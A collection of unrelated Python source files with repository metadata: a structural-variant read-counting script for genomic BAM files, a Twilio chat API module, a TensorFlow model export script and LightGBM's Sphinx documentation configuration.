except: if cigarstring[n]=='M': cigar_tuple_list.append((0,int(lt))) elif cigarstring[n]=='I': cigar_tuple_list.append((1,int(lt))) elif cigarstring[n]=='D': cigar_tuple_list.append((2,int(lt))) elif cigarstring[n]=='N': cigar_tuple_list.append((3,int(lt))) elif cigarstring[n]=='S': cigar_tuple_list.append((4,int(lt))) elif cigarstring[n]=='H': cigar_tuple_list.append((5,int(lt))) elif cigarstring[n]=='P': cigar_tuple_list.append((6,int(lt))) elif cigarstring[n]=='=': cigar_tuple_list.append((7,int(lt))) elif cigarstring[n]=='X': cigar_tuple_list.append((8,int(lt))) elif cigarstring[n]=='B': cigar_tuple_list.append((9,int(lt))) lt='' return cigar_tuple_list def estimate_mappedlength(cigarstring): # this function is same with read.reference_length made for MC tag or SA tag cg_num=len(cigarstring) lt='' current_m=0;current_d=0 for n in range(0,cg_num): try: lt = lt+str(int(cigarstring[n])) except: if cigarstring[n]=='M': current_m = current_m + int(lt) elif cigarstring[n]=='D' and current_m > 0: current_d = current_d +int(lt) else:'blank' lt='' return current_m+current_d def find_M_range(cigar): m_start=0;m_end=0 # m_start: just before the start, m_end= the exact end cigar_list=make_cigartuple(cigar) m_count=0 for (t, n) in cigar_list: if t == 0: m_count +=1 if m_count ==1: for (t,n) in cigar_list: if t!=0 and t!=1: m_start+=n elif t==0: m_end=m_start+n break elif m_count > 1: find_m=0;m_length=0 for (t,n) in cigar_list: if find_m==0 and t!=0 and t!=1: m_start+=n elif find_m >0 and t!=0 and t!=1: m_length+=n elif t==0: find_m+=1 if find_m < m_count: m_length+=n elif find_m == m_count: m_end=m_start+m_length break return([m_start, m_end]) def change_chr_to_int(chr1): if chr1[0:2]=='GL': chr_n=25 elif chr1[0:3]=='NC_': chr_n=26 elif chr1=='hs37d5': chr_n = 27 elif chr1[0:2]=='JH': chr_n=28 else: chr_n=int(((chr1.replace('X','23')).replace('Y','24')).replace('MT','25')) return(chr_n) def find_interCigar_BP(info1, info2, read_size): # info eg.: 1,162768391,-,43S46M62S SA_chr1=info1.split(',')[0] SA_chr1n=change_chr_to_int(SA_chr1) SA_pos1=int(info1.split(',')[1]) SA_strand1=info1.split(',')[2] SA_cigar1=info1.split(',')[3] SA_chr2=info2.split(',')[0] SA_chr2n=change_chr_to_int(SA_chr2) SA_pos2=int(info2.split(',')[1]) SA_strand2=info2.split(',')[2] SA_cigar2=info2.split(',')[3] M_range1=find_M_range(SA_cigar1) M_range2=find_M_range(SA_cigar2) len1=M_range1[1]-M_range1[0] len2=M_range2[1]-M_range2[0] if SA_strand1 == SA_strand2: #same_direction if M_range1[0] <= M_range2[0] and M_range1[1] >= M_range2[1]: return('overlap') elif M_range2[0] <= M_range1[0] and M_range2[1] >= M_range1[1]: return('overlap') if M_range1[1] > M_range2[1]: MHLEN=M_range2[1]-M_range1[0] bp1=SA_pos1 bp2=SA_pos2+len2-1 terminal1="5";terminal2="3" if SA_chr1!=SA_chr2: rearr="TRA" else: if bp1<=bp2: rearr="DUP" elif bp1>bp2: rearr="DEL" elif M_range2[1] > M_range1[1]: MHLEN=M_range1[1]-M_range2[0] bp1=SA_pos1+len1-1 bp2=SA_pos2 terminal1="3"; terminal2="5" if SA_chr1!=SA_chr2: rearr="TRA" else: if bp1<bp2: rearr="DEL" elif bp1>=bp2: rearr="DUP" else: 'blank' else: # opposite direction rvs_M_range1=[read_size-M_range1[1], read_size-M_range1[0]] if rvs_M_range1[0] <= M_range2[0] and rvs_M_range1[1] >= M_range2[1]: return('overlap') elif M_range2[0] <= rvs_M_range1[0] and M_range2[1] >= rvs_M_range1[1]: return('overlap') if rvs_M_range1[1] > M_range2[1]: MHLEN=M_range2[1]-rvs_M_range1[0] bp1=SA_pos1+len1-1 bp2=SA_pos2+len2-1 terminal1="3";terminal2="3" if SA_chr1!=SA_chr2: rearr="TRA" else: rearr="INV" elif M_range2[1] > rvs_M_range1[1]: MHLEN=rvs_M_range1[1]-M_range2[0] bp1=SA_pos1 bp2=SA_pos2 terminal1="5";terminal2="5" if SA_chr1!=SA_chr2: rearr="TRA" else: rearr="INV" else: 'blank' info=SA_chr1+':'+str(bp1)+';'+SA_chr2+':'+str(bp2)+';'+str(MHLEN)+';'+rearr+';'+terminal1+'to'+terminal2+';'+str(len1)+';'+str(len2) rvs_info=SA_chr2+':'+str(bp2)+';'+SA_chr1+':'+str(bp1)+';'+str(MHLEN)+';'+rearr+';'+terminal2+'to'+terminal1+';'+str(len2)+';'+str(len1) if SA_chr1n < SA_chr2n: return(info) elif SA_chr1n > SA_chr2n: return(rvs_info) elif SA_chr1n == SA_chr2n: if bp1 <= bp2: return(info) elif bp1 > bp2: return(rvs_info) def find_mate_from_SA(read): newBP_list=[];neoBP_list=[] reverse_list=['1','3','5','7','9','b','d','f'] cigar_info=read.cigarstring read_size=read.infer_read_length() SA_list=str(read.get_tag('SA')).split(';')[:-1] if hex(int(read.flag))[-2] in reverse_list: read_strand='-' else: read_strand='+' read_info=read.reference_name+','+str(read.reference_start+1)+','+read_strand+','+cigar_info for SA_indi in SA_list: res=find_interCigar_BP(read_info, SA_indi, read_size) if res != 'overlap': newBP_list.append(res) if len(SA_list)>1: info_combi=list(itertools.combinations(SA_list,2)) for (info1,info2) in info_combi: res=find_interCigar_BP(info1,info2,read_size) if res != 'overlap': neoBP_list.append(res) return(newBP_list, neoBP_list) def mate_list_summary(mate_list): summary_dic={} for mate in mate_list: mate_indi=mate.split(';') m1=int(mate_indi[5]) m2=int(mate_indi[6]) info=';'.join(mate_indi[0:5]) if info not in summary_dic.keys(): summary_dic[info]={} summary_dic[info]['num']=0 summary_dic[info]['match1']=[] summary_dic[info]['match2']=[] summary_dic[info]['num']+=1 summary_dic[info]['match1'].append(m1) summary_dic[info]['match2'].append(m2) final_list=[] for info in summary_dic.keys(): m1max=max(summary_dic[info]['match1']) m2max=max(summary_dic[info]['match2']) freq=summary_dic[info]['num'] final_list.append(info+';'+str(m1max)+';'+str(m2max)+'('+str(freq)+')') return (','.join(final_list)) def find_discordant_reads(chr1, pos1, ter1, chr2, pos2, ter2, pysam_file,sa_seq_list): pos1=int(pos1); pos2=int(pos2); ter1=int(ter1); ter2=int(ter2) new_mate_list=[];neo_mate_list=[] if ter1==3: pos1_start=pos1-fors; pos1_end=pos1+bacs elif ter1==5: pos1_start=pos1-bacs; pos1_end=pos1+fors if ter2==3: pos2_start=pos2-fors; pos2_end=pos2+bacs elif ter2==5: pos2_start=pos2-bacs; pos2_end=pos2+fors pos1_start=max(pos1_start, 1); pos2_start=max(pos2_start, 1) if chr1 == chr2 and ter1==5 and ter2 == 3 and pos1 < pos2: # exceptional short duplication pos1_end=min(pos1_end, pos1+(pos2-pos1)/2) pos2_start=max(pos2_start, pos2-(pos2-pos1)/2) elif chr1 == chr2 and ter1==3 and ter2 ==5 and pos2 < pos1: pos2_end=min(pos2_end, pos2+(pos1-pos2)/2) pos1_start=max(pos1_start, pos1-(pos1-pos2)/2) pair_true_list=[];sp_true_list=[];sa_true_list=[] pair_ref_list=[]; jx_ref_list=[] for read in pysam_file.fetch(chr1, pos1_start-1, pos1_end): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue if read.has_tag('SA')== True and ((ter1==3 and (read.cigartuples[-1][0]==4 or read.cigartuples[-1][0]==5)) or (ter1==5 and (read.cigartuples[0][0] ==4 or read.cigartuples[0][0] ==5))): SA_list=str(read.get_tag('SA')).split(';')[:-1] if read.is_reverse == True: PA_strand='+' elif read.is_reverse == False: PA_strand='-' SA_BP_candi=[] for SA_indi in SA_list: SA_chr=SA_indi.split(',')[0] SA_pos=int(SA_indi.split(',')[1]) SA_strand=SA_indi.split(',')[2] SA_cigar=SA_indi.split(',')[3] SA_cigartuples=make_cigartuple(SA_cigar) SA_MQ=SA_indi.split(',')[4] current_m=0; current_d=0 for cigar in SA_cigartuples: if cigar[0]==0: current_m=current_m+cigar[1] elif cigar[0]==2 and current_m > 0: current_d=current_d+cigar[1] elif (cigar[0]==4 or cigar[0]==5) and current_m > 0: break if ((SA_cigartuples[0][0]==4 or SA_cigartuples[0][0]==5) and SA_chr == chr2 and abs(SA_pos-pos2) <=1) or ((SA_cigartuples[-1][0]==4 or SA_cigartuples[-1][0]==5) and SA_chr == chr2 and abs(SA_pos + current_m + current_d-1-pos2) <=1): sa_true_list.append(read.query_name) sp_true_list.append(read.query_name) if ter1==3 and read.cigartuples[-1][0]==4: sc_seq=read.query_sequence[read.cigartuples[-1][1]*(-1): read.cigartuples[-1][1]*(-1)+sc_co] sa_seq_list.append(sc_seq) sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] elif ter1==5 and read.cigartuples[0][0]==4: sc_seq=read.query_sequence[read.cigartuples[0][1]-1-sc_co+1:read.cigartuples[0][1]-1+1] sa_seq_list.append(sc_seq) sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] sa_seq_list=list(set(sa_seq_list)) for read in pysam_file.fetch(chr1, pos1_start-1, pos1_end): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue pair_ref_mode='off';jx_ref_mode='off' if ter1==3: if read.is_reverse == False and read.mate_is_reverse == True and read.next_reference_name == chr1 and read.reference_start +1 < pos1 and read.reference_start +1 +read.template_length -1 > pos1 and read.template_length >= 0 and read.template_length < iscut: pair_ref_list.append(read.query_name) pair_ref_mode='on' if read.reference_start + 1 <= pos1 and read.reference_start + 1 + read.reference_length - 1 > pos1 and read.next_reference_name == chr1: jx_ref_list.append(read.query_name) jx_ref_mode='on' if pair_ref_mode == 'off' and read.is_reverse == False and read.next_reference_name == chr2 and read.next_reference_start +1 >= pos2_start and read.next_reference_start +1 < pos2_end: if (ter2==3 and read.mate_is_reverse == False) or (ter2==5 and read.mate_is_reverse == True): pair_true_list.append(read.query_name) if read.has_tag('SA') == True and read.query_name not in sa_true_list and read.query_name not in pair_ref_list: sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] if len(sa_seq_list) > 0: if pos1 - (read.reference_start +1) +1 == read.reference_length: if read.cigartuples[-1][0]==4 and read.cigartuples[-1][1] >= sc_co: sc_seq=read.query_sequence[read.cigartuples[-1][1]*(-1): read.cigartuples[-1][1]*(-1)+sc_co] if sc_seq in sa_seq_list: sp_true_list.append(read.query_name) elif ter1==5: if read.is_reverse == True and read.mate_is_reverse == False and read.next_reference_name==chr1 and read.reference_start +1 + read.reference_length -1 >= pos1 and read.reference_start + 1 + read.reference_length -1 +read.template_length + 1 < pos1 and read.template_length < 0 and read.template_length*(-1) < iscut: # in this situation read.template_length is negative value pair_ref_list.append(read.query_name) pair_ref_mode='on' if read.reference_start + 1 < pos1 and read.reference_start + 1 + read.reference_length - 1 >= pos1: jx_ref_list.append(read.query_name) jx_ref_mode='on' if pair_ref_mode=='off' and read.is_reverse == True and read.next_reference_name == chr2 and read.next_reference_start +1 >= pos2_start and read.next_reference_start +1 < pos2_end: if (ter2==3 and read.mate_is_reverse == False) or (ter2==5 and read.mate_is_reverse == True): pair_true_list.append(read.query_name) if read.has_tag('SA') == True and read.query_name not in sa_true_list and read.query_name not in pair_ref_list: sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] if len(sa_seq_list) > 0: if read.reference_start + 1 == pos1: if read.cigartuples[0][0] == 4 and read.cigartuples[0][1] >= sc_co: sc_seq=read.query_sequence[read.cigartuples[0][1]-1-sc_co+1:read.cigartuples[0][1]-1+1] if sc_seq in sa_seq_list: sp_true_list.append(read.query_name) sa_true_list=list(set(sa_true_list)) pair_ref_list=list(set(pair_ref_list)) jx_ref_list=list(set(jx_ref_list) & set(pair_ref_list)) all_ref_list=list(set(pair_ref_list+jx_ref_list)-set(sa_true_list)) pair_true_list=list(set(pair_true_list)-set(all_ref_list)) sp_true_list=list(set(sp_true_list)) all_true_list=list(set(pair_true_list+sp_true_list+sa_true_list)) if len(new_mate_list)==0: new_mate='NA' else: new_mate=mate_list_summary(new_mate_list) if len(neo_mate_list)==0: neo_mate='NA' else: neo_mate=mate_list_summary(neo_mate_list) return([pair_true_list, sp_true_list, sa_true_list, pair_ref_list, jx_ref_list, all_ref_list, sa_seq_list, new_mate,neo_mate]) def calc_final_count(chr1, pos1, ter1, chr2, pos2, ter2, t_bam, n_bam): pos1=int(pos1); pos2=int(pos2); ter1=int(ter1); ter2=int(ter2) a1=0; as1=0; asa1=0;r1=0;rj1=0; r2=0; rj2=0; na1=0; nsa1=0 normal_split1='off';normal_split2='off' sa_seq_list=[] t1_list=find_discordant_reads(chr1,pos1,ter1,chr2,pos2,ter2,t_bam,sa_seq_list) sa_seq_list=t1_list[6] new_mate1=t1_list[7] neo_mate1=t1_list[8] n1_list=find_discordant_reads(chr1,pos1,ter1,chr2,pos2,ter2,n_bam,sa_seq_list) sa_seq_list=[] t2_list=find_discordant_reads(chr2,pos2,ter2,chr1,pos1,ter1,t_bam,sa_seq_list) sa_seq_list=t2_list[6] new_mate2=t2_list[7] neo_mate2=t2_list[8] n2_list=find_discordant_reads(chr2,pos2,ter2,chr1,pos1,ter1,n_bam,sa_seq_list) n1_pair_list=n1_list[0] n1_sp_list=n1_list[1] n1_sa_list=n1_list[2] n2_pair_list=n2_list[0] n2_sp_list=n2_list[1] n2_sa_list=n2_list[2] t1_pair_list=t1_list[0] t1_sp_list=t1_list[1] t1_sa_list=t1_list[2] t1_rj_list=t1_list[4] t1_rt_list=t1_list[5] t2_pair_list=t2_list[0] t2_sp_list=t2_list[1] t2_sa_list=t2_list[2] t2_rj_list=t2_list[4] t2_rt_list=t2_list[5] t1_total_list=list(set(t1_pair_list+t1_sp_list+t1_sa_list)) t1_sp_list=list(set(t1_sp_list+t1_sa_list)) t2_total_list=list(set(t2_pair_list+t2_sp_list+t2_sa_list)) t2_sp_list=list(set(t2_sp_list+t2_sa_list)) t_tot_n=len(list(set(t1_total_list+t2_total_list))) t_split_n=len(list(set(t1_sp_list+t2_sp_list))) t_sa_n=len(list(set(t1_sa_list+t2_sa_list))) t1_reftot_n=len(t1_rt_list) t1_refjx_n=len(t1_rj_list) t2_reftot_n=len(t2_rt_list) t2_refjx_n=len(t2_rj_list) n_tot_n=len(list(set(n1_pair_list+n1_sa_list+n2_pair_list+n2_sa_list))) n_sa_n=len(list(set(n1_sa_list+n2_sa_list))) return([t_tot_n, t_split_n,t_sa_n, t1_reftot_n, t1_refjx_n, t2_reftot_n, t2_refjx_n, n_tot_n, n_sa_n, new_mate1, neo_mate1, new_mate2, neo_mate2]) def count_frag_num(chr1, pos1, pysam_file): pos1=int(pos1);total_frag_list=[] for read in pysam_file.fetch(chr1, pos1-1, pos1): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue total_frag_list.append(read.query_name) total_frag_list=list(set(total_frag_list)) return len(total_frag_list) while sv_line: if sv_line[0:4]=='#CHR': out_file.write(sv_line+'\tTumor_Ref1;Ref2;AllDiscordantFragments;SplitFragments;SATagFragments;Vaf1;Vaf2\tPairNormal_AllFragments;SAFragments;FragCount1;FragCount2\tnew_mate1\tneo_mate1\tnew_mate2\tneo_mate2\n') elif sv_line[0]=='#': out_file.write(sv_line+'\n') else: shortDstatus='off' sv_indi=sv_line.split('\t') chr1=sv_indi[c_chr1]; pos1=sv_indi[c_pos1]; chr2=sv_indi[c_chr2]; pos2=sv_indi[c_pos2] svtype=sv_indi[c_type] if pos2 == '.' or svtype == 'INS': print_list=[sv_line, '.','.','.','.','.','.'] else: ter1=sv_indi[c_ter].split('to')[0]; ter2=sv_indi[c_ter].split('to')[1] res = calc_final_count(chr1, pos1, ter1, chr2, pos2, ter2, t_file, n_file) adf=res[0];sf=res[1];saf=res[2];ref1=res[3];rj1=res[4];ref2=res[5];rj2=res[6];na1=res[7];nsa1=res[8] new_mate1=res[9]; neo_mate1=res[10]; new_mate2=res[11]; neo_mate2=res[12] pnfc1=count_frag_num(chr1, pos1, n_file) pnfc2=count_frag_num(chr2, pos2, n_file) if chr1 == chr2 and ter1 == '3' and ter2 == '5' and abs(int(pos2)-int(pos1)) < shortDco: adf=sf ref1=rj1 ref2=rj2 elif adf == sf: ref1=rj1 ref2=rj2 if adf+ref1 == 0: vaf1 = 'NA' else: vaf1=str(round((adf)*100/float(adf+ref1),2))+'%' if adf+ref2 == 0: vaf2 = 'NA' else: vaf2=str(round((adf)*100/float(adf+ref2),2))+'%' # asr1 and asr2 were not counted in 'else' d/t redundancy with r1, r2 t_info_list=[str(ref1),str(ref2),str(adf),str(sf),str(saf),vaf1,vaf2] n_info_list=[str(na1),str(nsa1),str(pnfc1), str(pnfc2)] print_list=[sv_line, ';'.join(t_info_list), ';'.join(n_info_list), new_mate1, neo_mate1, new_mate2, neo_mate2] out_file.write('\t'.join(print_list)+'\n') sv_line=sv_file.readline().strip()
[ "hs960201@gmail.com" ]
hs960201@gmail.com
17cc97ea656c6d3d58dba14ba7110219c4c455a7
9e27f91194541eb36da07420efa53c5c417e8999
/twilio/rest/chat/v1/__init__.py
7698c973fa1814942bb972c9ac2a08709c89c066
[]
no_license
iosmichael/flask-admin-dashboard
0eeab96add99430828306b691e012ac9beb957ea
396d687fd9144d3b0ac04d8047ecf726f7c18fbd
refs/heads/master
2020-03-24T05:55:42.200377
2018-09-17T20:33:42
2018-09-17T20:33:42
142,508,888
0
1
null
null
null
null
UTF-8
Python
false
false
1,299
py
# coding=utf-8 """ This code was generated by \ / _ _ _| _ _ | (_)\/(_)(_|\/| |(/_ v1.0.0 / / """ from admin.twilio.base.version import Version from admin.twilio.rest.chat.v1.credential import CredentialList from admin.twilio.rest.chat.v1.service import ServiceList class V1(Version): def __init__(self, domain): """ Initialize the V1 version of Chat :returns: V1 version of Chat :rtype: twilio.rest.chat.v1.V1.V1 """ super(V1, self).__init__(domain) self.version = 'v1' self._credentials = None self._services = None @property def credentials(self): """ :rtype: twilio.rest.chat.v1.credential.CredentialList """ if self._credentials is None: self._credentials = CredentialList(self) return self._credentials @property def services(self): """ :rtype: twilio.rest.chat.v1.service.ServiceList """ if self._services is None: self._services = ServiceList(self) return self._services def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ return '<Twilio.Chat.V1>'
[ "michaelliu@iresearch.com.cn" ]
michaelliu@iresearch.com.cn
68a6a2550cc81753aa234a09cb81ae0d79c49c3b
2b15168bc67ee935446f51c46045f73346369c5a
/extract_ckpt_to_h5_weight.py
faeda2d12d610e45a0d94bce680cbd2a9bfed7bc
[]
no_license
jason9075/tf2_arcface
6c37500c9c14170ea6731f6a0d79a19f088c32d3
6fabcdf9c3c9a12603456476fc8052de2830684d
refs/heads/master
2023-04-30T11:42:52.845549
2021-04-01T06:59:39
2021-04-01T06:59:39
311,858,885
0
0
null
null
null
null
UTF-8
Python
false
false
501
py
import tensorflow as tf from convert_tensorflow import create_training_model num_of_class = 20000 IMAGE_SIZE = (112, 112) CKPT = 'checkpoints/2021-03-29-10-26-19_e_1400' MODEL_TYPE = 'mobilenetv3' def main(): model = create_training_model(IMAGE_SIZE, num_of_class, mode='train', model_type=MODEL_TYPE) model.load_weights(CKPT) filename = CKPT.split('/')[-1] model.save(f'saved_model/{filename}.h5', include_optimizer=True, save_format='h5') if __name__ == '__main__': main()
[ "jason9075@gmail.com" ]
jason9075@gmail.com
d0df7bd7de21e649e7b4d18ce66c317f65bf0a22
9e9e0b52248d8c4a9026d266ebeb02529bbc8e9f
/lightGBM/docs/conf.py
637447ed627ca9d6df815867ffeda3b97017e4f6
[ "MIT", "Apache-2.0", "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
arXiv-research/Quatm
79b870a754eb8173675da7316b10c6dac76de92f
541fc48b88f4236767059f3265c7d34b9eacb85f
refs/heads/main
2023-07-16T13:37:54.326816
2021-09-03T11:17:22
2021-09-03T11:17:22
338,906,115
2
1
MIT
2021-09-03T11:17:23
2021-02-14T21:30:28
C++
UTF-8
Python
false
false
11,826
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # LightGBM documentation build configuration file, created by # sphinx-quickstart on Thu May 4 14:30:58 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute. """Sphinx configuration file.""" import datetime import os import sys from distutils.dir_util import copy_tree from re import compile from subprocess import PIPE, Popen from unittest.mock import Mock import sphinx from docutils.nodes import reference from docutils.parsers.rst import Directive from docutils.transforms import Transform from sphinx.errors import VersionRequirementError CURR_PATH = os.path.abspath(os.path.dirname(__file__)) LIB_PATH = os.path.join(CURR_PATH, os.path.pardir, 'python-package') sys.path.insert(0, LIB_PATH) INTERNAL_REF_REGEX = compile(r"(?P<url>\.\/.+)(?P<extension>\.rst)(?P<anchor>$|#)") # -- mock out modules MOCK_MODULES = ['numpy', 'scipy', 'scipy.sparse', 'sklearn', 'matplotlib', 'pandas', 'graphviz', 'dask', 'dask.distributed'] for mod_name in MOCK_MODULES: sys.modules[mod_name] = Mock() class InternalRefTransform(Transform): """Replaces '.rst' with '.html' in all internal links like './[Something].rst[#anchor]'.""" default_priority = 210 """Numerical priority of this transform, 0 through 999.""" def apply(self, **kwargs): """Apply the transform to the document tree.""" for section in self.document.traverse(reference): if section.get("refuri") is not None: section["refuri"] = INTERNAL_REF_REGEX.sub(r"\g<url>.html\g<anchor>", section["refuri"]) class IgnoredDirective(Directive): """Stub for unknown directives.""" has_content = True def run(self): """Do nothing.""" return [] # -- General configuration ------------------------------------------------ os.environ['LIGHTGBM_BUILD_DOC'] = '1' C_API = os.environ.get('C_API', '').lower().strip() != 'no' RTD = bool(os.environ.get('READTHEDOCS', '')) # If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = '2.1.0' # Due to sphinx.ext.napoleon, autodoc_typehints if needs_sphinx > sphinx.__version__: message = f'This project needs at least Sphinx v{needs_sphinx}' raise VersionRequirementError(message) # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon', ] autodoc_default_flags = ['members', 'inherited-members', 'show-inheritance'] autodoc_default_options = { "members": True, "inherited-members": True, "show-inheritance": True, } # hide type hints in API docs autodoc_typehints = "none" # Generate autosummary pages. Output should be set with: `:toctree: pythonapi/` autosummary_generate = ['Python-API.rst'] # Only the class' docstring is inserted. autoclass_content = 'class' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # The master toctree document. master_doc = 'index' # General information about the project. project = 'LightGBM' copyright = f'{datetime.datetime.now().year}, Microsoft Corporation' author = 'Microsoft Corporation' # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = os.path.join(CURR_PATH, 'logo', 'LightGBM_logo_grey_text.svg') # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = os.path.join(CURR_PATH, '_static', 'images', 'favicon.ico') # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. with open(os.path.join(CURR_PATH, os.path.pardir, 'VERSION.txt'), 'r') as f: # The short X.Y version. version = f.read().strip() # The full version, including alpha/beta/rc tags. release = version # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'default' # -- Configuration for C API docs generation ------------------------------ if C_API: extensions.extend([ 'breathe', ]) breathe_projects = { "LightGBM": os.path.join(CURR_PATH, 'doxyoutput', 'xml') } breathe_default_project = "LightGBM" breathe_domain_by_extension = { "h": "c", } breathe_show_define_initializer = True c_id_attributes = ['LIGHTGBM_C_EXPORT'] # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { 'includehidden': False, 'logo_only': True, } # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'LightGBMdoc' # -- Options for LaTeX output --------------------------------------------- # The name of an image file (relative to this directory) to place at the top of # the title page. latex_logo = os.path.join(CURR_PATH, 'logo', 'LightGBM_logo_black_text_small.png') def generate_doxygen_xml(app): """Generate XML documentation for C API by Doxygen. Parameters ---------- app : object The application object representing the Sphinx process. """ input = os.path.join(CURR_PATH, os.path.pardir, 'include', 'LightGBM', 'c_api.h') doxygen_args = [ f"INPUT={input}", f"OUTPUT_DIRECTORY={os.path.join(CURR_PATH, 'doxyoutput')}", "GENERATE_HTML=NO", "GENERATE_LATEX=NO", "GENERATE_XML=YES", "XML_OUTPUT=xml", "XML_PROGRAMLISTING=YES", r'ALIASES="rst=\verbatim embed:rst:leading-asterisk"', r'ALIASES+="endrst=\endverbatim"', "ENABLE_PREPROCESSING=YES", "MACRO_EXPANSION=YES", "EXPAND_ONLY_PREDEF=NO", "SKIP_FUNCTION_MACROS=NO", "SORT_BRIEF_DOCS=YES", "WARN_AS_ERROR=YES", ] doxygen_input = '\n'.join(doxygen_args) doxygen_input = bytes(doxygen_input, "utf-8") if not os.path.exists(os.path.join(CURR_PATH, 'doxyoutput')): os.makedirs(os.path.join(CURR_PATH, 'doxyoutput')) try: # Warning! The following code can cause buffer overflows on RTD. # Consider suppressing output completely if RTD project silently fails. # Refer to https://github.com/svenevs/exhale # /blob/fe7644829057af622e467bb529db6c03a830da99/exhale/deploy.py#L99-L111 process = Popen(["doxygen", "-"], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate(doxygen_input) output = '\n'.join([i.decode('utf-8') for i in (stdout, stderr) if i is not None]) if process.returncode != 0: raise RuntimeError(output) else: print(output) except BaseException as e: raise Exception(f"An error has occurred while executing Doxygen\n{e}") def generate_r_docs(app): """Generate documentation for R-package. Parameters ---------- app : object The application object representing the Sphinx process. """ commands = f""" /home/docs/.conda/bin/conda create \ -q \ -y \ -c conda-forge \ -n r_env \ cmake=3.18.2=ha30ef3c_0 \ r-base=4.0.3=ha43b4e8_3 \ r-data.table=1.13.2=r40h0eb13af_0 \ r-jsonlite=1.7.1=r40hcdcec82_0 \ r-matrix=1.2_18=r40h7fa42b6_3 \ r-pkgdown=1.6.1=r40h6115d3f_0 \ r-roxygen2=7.1.1=r40h0357c0b_0 source /home/docs/.conda/bin/activate r_env export TAR=/bin/tar cd {os.path.join(CURR_PATH, os.path.pardir)} export R_LIBS="$CONDA_PREFIX/lib/R/library" Rscript build_r.R || exit -1 cd {os.path.join(CURR_PATH, os.path.pardir, "lightgbm_r")} Rscript -e "roxygen2::roxygenize(load = 'installed')" || exit -1 Rscript -e "pkgdown::build_site( \ lazy = FALSE \ , install = FALSE \ , devel = FALSE \ , examples = TRUE \ , run_dont_run = TRUE \ , seed = 42L \ , preview = FALSE \ , new_process = TRUE \ ) " || exit -1 cd {os.path.join(CURR_PATH, os.path.pardir)} """ try: # Warning! The following code can cause buffer overflows on RTD. # Consider suppressing output completely if RTD project silently fails. # Refer to https://github.com/svenevs/exhale # /blob/fe7644829057af622e467bb529db6c03a830da99/exhale/deploy.py#L99-L111 process = Popen(['/bin/bash'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True) stdout, stderr = process.communicate(commands) output = '\n'.join([i for i in (stdout, stderr) if i is not None]) if process.returncode != 0: raise RuntimeError(output) else: print(output) except BaseException as e: raise Exception(f"An error has occurred while generating documentation for R-package\n{e}") def setup(app): """Add new elements at Sphinx initialization time. Parameters ---------- app : object The application object representing the Sphinx process. """ first_run = not os.path.exists(os.path.join(CURR_PATH, '_FIRST_RUN.flag')) if first_run and RTD: open(os.path.join(CURR_PATH, '_FIRST_RUN.flag'), 'w').close() if C_API: app.connect("builder-inited", generate_doxygen_xml) else: app.add_directive('doxygenfile', IgnoredDirective) if RTD: # build R docs only on Read the Docs site if first_run: app.connect("builder-inited", generate_r_docs) app.connect("build-finished", lambda app, _: copy_tree(os.path.join(CURR_PATH, os.path.pardir, "lightgbm_r", "docs"), os.path.join(app.outdir, "R"), verbose=0)) app.add_transform(InternalRefTransform) add_js_file = getattr(app, 'add_js_file', False) or app.add_javascript add_js_file("js/script.js")
[ "noreply@github.com" ]
arXiv-research.noreply@github.com
66620a99f9c591d0399fb64135bc18f5511daf3e
9fa8c280571c099c5264960ab2e93255d20b3186
/system/scientist/experiment/remove/view.py
e49dc213fd8a1d49e71b132d6416187033778689
[ "MIT" ]
permissive
thuchula6792/AutoOED
8dc97191a758200dbd39cd850309b0250ac77cdb
272d88be7ab617a58d3f241d10f4f9fd17b91cbc
refs/heads/master
2023-07-23T16:06:13.820272
2021-09-08T14:22:18
2021-09-08T14:22:18
null
0
0
null
null
null
